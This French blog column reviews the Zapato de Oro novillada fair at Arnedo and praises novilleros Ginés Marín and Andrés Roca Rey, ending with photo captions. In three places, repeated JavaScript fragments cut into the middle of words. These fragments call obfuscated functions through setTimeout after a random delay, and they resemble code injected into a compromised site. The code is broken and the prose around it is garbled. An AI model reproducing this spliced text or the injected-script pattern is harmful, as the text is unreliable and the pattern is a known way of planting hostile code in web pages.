AVEC ZAPATO OU SANS ZAPATO

La feria des novilladas du Zapato de Oro s’est achevée. Quinze novilleros sont passés par là. Parmi eux, certains se sont distingués : Ginés Marín –récompensé finalement avec le trophée- et Andrés Roca Rey, le seul à avoir réussi à ouvrir la grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande porte de l’Arnedo Arenas. Tous deux avaient affronté le même jour du bétail de Fernandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando Peña et tous deux ont été au-dessus des conditions des novillos qui leur échurent.

Le Péruvien Roca Rey m’a impressionné surtout pour deux raisons : la facilité avec laquelle il conçoit et réalise le toreo, même dans les passes de cape les plus risquées –ce qui est étonnant chez quelqu’un qui, proche de ses dix-huit ans, ne débuta en piquée que le 1 juin dernier à Captieux, se présentant à Arnedo avec uniquement huit novilladas toréées-  et le courage que ce garçon porte en lui. Du vrai courage, pas du postiche.

Un courage calme et plein de sereines cadences. Du courage pour réfléchir tranquillement devant le toro et réaliser tout ce qu’il se propose avec de la technique et une volonté déterminée. Du courage faisant fi des coups, comme ceux qu’il reçut à Arnedo prouvant ainsi à l’aficion qu’il assume, fait face et affronte risques, douleurs et contretemps, avec cette attitude qu’ont toujours montrée les toreros vaillants : avec de la fermeté et se sublimant devant le danger.

J’attends avec beaucoup d’intérêt sa présentation à Valence –il aura déjà toréé quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and ceci sera publié- et le mano a mano qui tient l’aficion de Lima en émoi, celui du 25 octobre prochain où il partagera l’affiche avec son compatriote Joaquín Galdós, qui lui aussi démarre fort.

Chez ce garçon de dix-sept ans palpite la flamme de ce qui est extraordinaire. Au-delà de ce qui est palpable, comme le courage, la technique, l’intelligence, le toreo compte sur d’autres registres plus secrets, plus fugitifs, que l’on imagine plus que l’on n’apprécie, qui éblouissent plus qu’on ne les voit. Sur ce terrain commence la magie, et ceci palpite dans le toreo de Ginés Marín. Il propose ce quelque chose d’indéfinissable qui parfume tout ce qu’il réalise et nous ouvre de suite une fenêtre vers l’exceptionnel.

Ce garçon réunit de nombreux atouts qui le projettent vers un avenir prometteur. Je ne sais pas s’il y parviendra –la route est longue, dure et pleine d’incertitudes- mais s’il réussit, s’il est torero, il va être cher, très cher. Sans aucun doute. À Arnedo il a toréé avec du temple et ce qui est plus important…avec pureté ! Il avançait sa poitrine devant les novillos, surtout de la main gauche ; il prolongea les charges avec de la douceur et de la poigne, et lorsque –comme cela se produisit à son second- le novillo s’arrêta, il lui monta dessus et le força à charger, même si celui qui le fit réellement ce fut le torero. Il laissa la trace parfumée du bon toreo et avec cette saveur je suivrai avec attention sa prestation à la feria de El Pilar, où il aura torée deux jours avant la mise en ligne de cette article.

Avec Zapato ou sans Zapato –les deux auraient mérité le prix- notez ces deux noms, car la prochaine saison en raison de leur talent, de leur capacité et de leur aficion, ils feront parler d’eux. Et sinon : laissons du temps au temps.

fotos bruno Lasnier

Gines Marin en mont de marsan y Roca Rey en Captieux

gines3

gines2

gines1

roca11

roca05

roca09

Les commentaires sont fermés.